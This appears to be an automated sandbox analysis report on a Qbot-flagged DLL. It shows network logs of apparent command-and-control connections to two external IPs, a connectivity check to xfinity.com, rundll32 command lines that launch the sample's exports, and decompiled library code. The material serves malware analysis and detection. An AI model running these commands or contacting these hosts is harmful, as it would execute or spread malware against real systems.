                                                                    May 31, 2023 02:02:35.103456974 CEST49741443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:37.121635914 CEST49742443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:37.121701956 CEST44349742124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:37.121778011 CEST49742443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:37.122220039 CEST49742443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:37.122242928 CEST44349742124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:38.299043894 CEST44349742124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:38.303081036 CEST49743443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:38.303142071 CEST44349743124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:38.303263903 CEST49743443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:38.303643942 CEST49743443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:38.303658962 CEST44349743124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:41.338814974 CEST44349743124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:41.339780092 CEST49744443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.339833975 CEST44349744124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:41.339911938 CEST49744443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.340133905 CEST49744443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.340182066 CEST44349744124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:41.340274096 CEST49744443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.343740940 CEST49745443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.343780994 CEST44349745124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:41.343873024 CEST49745443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.344304085 CEST49745443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:41.344316959 CEST44349745124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:44.378490925 CEST44349745124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:44.379211903 CEST49746443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:44.379277945 CEST44349746124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:44.379360914 CEST49746443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:44.381783009 CEST49746443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:44.381829977 CEST44349746124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:47.578855038 CEST44349746124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:47.584633112 CEST49747443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:47.584695101 CEST44349747124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:47.584842920 CEST49747443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:47.584963083 CEST49747443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:47.588301897 CEST44349747124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:47.593269110 CEST44349747124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:47.593489885 CEST49747443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:52.596609116 CEST497483389192.168.2.585.57.212.13
                                                                    May 31, 2023 02:02:55.606086016 CEST497483389192.168.2.585.57.212.13
                                                                    May 31, 2023 02:03:01.606621981 CEST497483389192.168.2.585.57.212.13
                                                                    May 31, 2023 02:03:08.704651117 CEST497493389192.168.2.585.57.212.13
                                                                    May 31, 2023 02:03:11.716850042 CEST497493389192.168.2.585.57.212.13
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 31, 2023 02:02:18.465459108 CEST | 59220 | 53 | 192.168.2.5 | 8.8.8.8
May 31, 2023 02:02:18.638864994 CEST | 53 | 59220 | 8.8.8.8 | 192.168.2.5
May 31, 2023 02:02:19.295789957 CEST | 55068 | 53 | 192.168.2.5 | 8.8.8.8

Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 31, 2023 02:02:55.646030903 CEST | 85.57.212.13 | 192.168.2.5 | e919 | (Host unreachable) | Destination Unreachable
May 31, 2023 02:02:58.656105042 CEST | 85.57.212.13 | 192.168.2.5 | e919 | (Host unreachable) | Destination Unreachable
May 31, 2023 02:03:04.658116102 CEST | 85.57.212.13 | 192.168.2.5 | e919 | (Host unreachable) | Destination Unreachable
May 31, 2023 02:03:10.740196943 CEST | 85.57.212.13 | 192.168.2.5 | e919 | (Host unreachable) | Destination Unreachable
May 31, 2023 02:03:14.767111063 CEST | 85.57.212.13 | 192.168.2.5 | e919 | (Host unreachable) | Destination Unreachable

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 31, 2023 02:02:18.465459108 CEST | 192.168.2.5 | 8.8.8.8 | 0xb38e | Standard query (0) | xfinity.com | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:19.295789957 CEST | 192.168.2.5 | 8.8.8.8 | 0xb2e3 | Standard query (0) | www.xfinity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 31, 2023 02:02:18.638864994 CEST | 8.8.8.8 | 192.168.2.5 | 0xb38e | No error (0) | xfinity.com | | 68.87.41.40 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:18.638864994 CEST | 8.8.8.8 | 192.168.2.5 | 0xb38e | No error (0) | xfinity.com | | 96.114.21.40 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:18.638864994 CEST | 8.8.8.8 | 192.168.2.5 | 0xb38e | No error (0) | xfinity.com | | 96.114.14.140 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:19.331722975 CEST | 8.8.8.8 | 192.168.2.5 | 0xb2e3 | No error (0) | www.xfinity.com | www.xfinity.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                    • xfinity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49731 | 68.87.41.40 | 443 | C:\Windows\SysWOW64\wermgr.exe

Timestamp | kBytes transferred | Direction | Data
2023-05-31 00:02:19 UTC | 0 | OUT | GET / HTTP/1.1
    Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: xfinity.com
    Cache-Control: no-cache
2023-05-31 00:02:19 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
    Location: https://www.xfinity.com/
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49733 | 68.87.41.40 | 443 | C:\Windows\SysWOW64\wermgr.exe

Timestamp | kBytes transferred | Direction | Data
2023-05-31 00:02:21 UTC | 0 | OUT | GET / HTTP/1.1
    Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: xfinity.com
    Cache-Control: no-cache
    Cookie: xpgn=1
2023-05-31 00:02:21 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
    Location: https://www.xfinity.com/
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8


                                                                    Target ID:0
                                                                    Start time:01:59:07
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\F072.dll"
                                                                    Imagebase:0x2e0000
                                                                    File size:126464 bytes
                                                                    MD5 hash:3B4636AE519868037940CA5C4272091B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Target ID:1
                                                                    Start time:01:59:07
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7fcd70000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:01:59:07
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:3
                                                                    Start time:01:59:07
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:01:59:07
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:8
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664
                                                                    Imagebase:0x910000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:9
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664
                                                                    Imagebase:0x910000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:10
                                                                    Start time:01:59:10
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:11
                                                                    Start time:01:59:13
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:13
                                                                    Start time:01:59:13
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652
                                                                    Imagebase:0x910000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:14
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:15
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:16
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:17
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",next
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                    Target ID:18
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:19
                                                                    Start time:01:59:16
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration
                                                                    Imagebase:0x9a0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:22
                                                                    Start time:01:59:17
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652
                                                                    Imagebase:0x910000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:23
                                                                    Start time:01:59:17
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652
                                                                    Imagebase:0x910000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:24
                                                                    Start time:01:59:20
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\wermgr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                                    Imagebase:0x1080000
                                                                    File size:191904 bytes
                                                                    MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log$ByteCharMultiWide$LibraryLoad$_errnomv_calloc$DesktopWindowatoimv_malloczmv_realloc_arraywcslen
                                                                      • String ID: DXVA2CreateDirect3DDeviceManager9$Direct3DCreate9$Direct3DCreate9Ex$Failed to bind Direct3D device to device manager$Failed to create Direct3D device manager$Failed to load D3D9 library$Failed to load DXVA2 library$Failed to locate DXVA2CreateDirect3DDeviceManager9$Failed to open device handle$SetDefaultDllDirectories$Using D3D9Ex device.$d3d9.dll$dxva2.dll
                                                                      • API String ID: 2285110006-3565051934
                                                                      • Opcode ID: 81119a8c00db03e304e4471758cb6eecfd6299740ba6e44e8e551f5fdf6c1372
                                                                      • Instruction ID: 81d1aa8d4d65b830f3c484e294571b6d288d1a976026b3de523a4ddd3e2ab054
                                                                      • Opcode Fuzzy Hash: 81119a8c00db03e304e4471758cb6eecfd6299740ba6e44e8e551f5fdf6c1372
                                                                      • Instruction Fuzzy Hash: B372CFB49097459FD750EF68D58461EBBE1FF88344F91892EE888C7351EB78D844CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 27%
                                                                      			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
                                                                      				char _t142;
                                                                      				intOrPtr _t144;
                                                                      				signed int _t145;
                                                                      				signed int _t148;
                                                                      				char _t160;
                                                                      				signed int _t163;
                                                                      				signed int _t166;
                                                                      				unsigned int _t178;
                                                                      				signed int _t182;
                                                                      				char* _t191;
                                                                      				char _t192;
                                                                      				char* _t206;
                                                                      				void* _t211;
                                                                      				unsigned int _t227;
                                                                      				intOrPtr _t238;
                                                                      				intOrPtr _t241;
                                                                      				signed int _t243;
                                                                      				signed int _t250;
                                                                      				signed int _t272;
                                                                      				intOrPtr _t273;
                                                                      				char* _t280;
                                                                      				unsigned int _t284;
                                                                      				intOrPtr _t285;
                                                                      				signed int _t289;
                                                                      				signed int _t292;
                                                                      				void* _t293;
                                                                      				char* _t329;
                                                                      				unsigned int _t330;
                                                                      				unsigned int _t332;
                                                                      				signed int _t333;
                                                                      				signed int _t337;
                                                                      				unsigned int _t341;
                                                                      				unsigned int _t351;
                                                                      				char* _t353;
                                                                      				intOrPtr _t379;
                                                                      				char* _t380;
                                                                      				signed int _t381;
                                                                      				signed int _t382;
                                                                      				char* _t386;
                                                                      				unsigned int _t387;
                                                                      				signed int _t388;
                                                                      				char* _t390;
                                                                      				signed int _t395;
                                                                      				void* _t397;
                                                                      				signed int _t399;
                                                                      				signed int _t402;
                                                                      				void* _t403;
                                                                      				char _t420;
                                                                      				signed int _t421;
                                                                      				char* _t423;
                                                                      				signed int _t425;
                                                                      				char* _t426;
                                                                      				char* _t428;
                                                                      				void* _t431;
                                                                      				char** _t432;
                                                                      				char** _t434;
                                                                      				char** _t435;
                                                                      				intOrPtr* _t438;
                                                                      				void* _t440;
                                                                      
                                                                      				_push(__edi);
                                                                      				_push(__esi);
                                                                      				_push(__ebx);
                                                                      				_t432 = _t431 - 0x2c;
                                                                      				_t423 = _t432[0x10];
                                                                      				_t432[6] = _t432[0x11];
                                                                      				_t142 =  *_t423;
                                                                      				_t440 = _t142 - 2;
                                                                      				if(_t440 == 0) {
                                                                      					L60();
                                                                      					if(_t432[6] >= 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L14;
                                                                      					}
                                                                      					goto L12;
                                                                      				} else {
                                                                      					if(_t440 > 0) {
                                                                      						if(_t142 != 3) {
                                                                      							_t144 = 0xffffffea;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t191 = _t432[6];
                                                                      							_t434 =  &(_t432[0xb]);
                                                                      							_t353 = _t423;
                                                                      							_pop(_t273);
                                                                      							_pop(_t403);
                                                                      							_pop(_t389);
                                                                      							_pop(_t427);
                                                                      							_t428 = _t353;
                                                                      							_t390 = _t191;
                                                                      							_push(_t403);
                                                                      							_push(_t273);
                                                                      							_t435 = _t434 - 0x4c;
                                                                      							_t192 =  *_t353;
                                                                      							if(_t192 == 3) {
                                                                      								_t206 = _t428[4];
                                                                      								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 
0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
                                                                      								goto L74;
                                                                      							} else {
                                                                      								_t332 = _t353[8];
                                                                      								if(_t192 != 2) {
                                                                      									_t435[5] = 0x29a;
                                                                      									_t435[1] = 0;
                                                                      									 *_t435 = 0;
                                                                      									_t435[4] = "libavutil/channel_layout.c";
                                                                      									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
                                                                      									_t435[2] = "Assertion %s failed at %s:%d\n";
                                                                      									E10026560();
                                                                      									L100A06B8();
                                                                      									_t438 = _t435 - 0x41c;
                                                                      									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
                                                                      									_t238 =  *((intOrPtr*)(_t438 + 0x424));
                                                                      									_t379 =  *((intOrPtr*)(_t438 + 0x428));
                                                                      									if(_t238 != 0 || _t379 == 0) {
                                                                      										 *((intOrPtr*)(_t438 + 8)) = _t379;
                                                                      										_t285 = _t438 + 0x10;
                                                                      										 *((intOrPtr*)(_t438 + 4)) = _t238;
                                                                      										 *_t438 = _t285;
                                                                      										L100089A0();
                                                                      										 *((intOrPtr*)(_t438 + 4)) = _t285;
                                                                      										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
                                                                      										_t241 = E1000D4D0(_t285, _t390, _t403);
                                                                      										if(_t241 >= 0) {
                                                                      											_t241 =  *((intOrPtr*)(_t438 + 0x14));
                                                                      										}
                                                                      									} else {
                                                                      										_t241 = 0xffffffea;
                                                                      									}
                                                                      									return _t241;
                                                                      								} else {
                                                                      									_t420 = _t353[4];
                                                                      									_t380 = 0;
                                                                      									_t280 = 0xffffffff;
                                                                      									if(_t420 > 0) {
                                                                      										do {
                                                                      											_t206 =  *_t332 - 0x400;
                                                                      											if(_t206 > 0x3ff) {
                                                                      												goto L67;
                                                                      											} else {
                                                                      												if(_t380 > 0) {
                                                                      													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
                                                                      														goto L72;
                                                                      													} else {
                                                                      														goto L66;
                                                                      													}
                                                                      												} else {
                                                                      													if(_t206 > 0x3ff) {
                                                                      														goto L67;
                                                                      													} else {
                                                                      														if(_t206 == _t380) {
                                                                      															L66:
                                                                      															_t280 = _t380;
                                                                      															goto L67;
                                                                      														} else {
                                                                      															goto L72;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											goto L90;
                                                                      											L67:
                                                                      											_t380 =  &(_t380[1]);
                                                                      											_t332 = _t332 + 0x18;
                                                                      										} while (_t380 != _t420);
                                                                      										L74:
                                                                      										if(_t280 < 0) {
                                                                      											goto L72;
                                                                      										} else {
                                                                      											asm("pxor xmm0, xmm0");
                                                                      											asm("cvtsi2sd xmm0, ebx");
                                                                      											asm("sqrtsd xmm0, xmm0");
                                                                      											asm("cvttsd2si eax, xmm0");
                                                                      											_t406 =  &(_t206[1]) *  &(_t206[1]);
                                                                      											if(_t406 !=  &(_t280[1])) {
                                                                      												goto L72;
                                                                      											} else {
                                                                      												_t435[2] = _t206;
                                                                      												_t435[1] = "ambisonic %d";
                                                                      												 *_t435 = _t390;
                                                                      												L100089C0();
                                                                      												_t329 = _t428[4];
                                                                      												if(_t329 > _t406) {
                                                                      													_t211 = 0;
                                                                      													do {
                                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
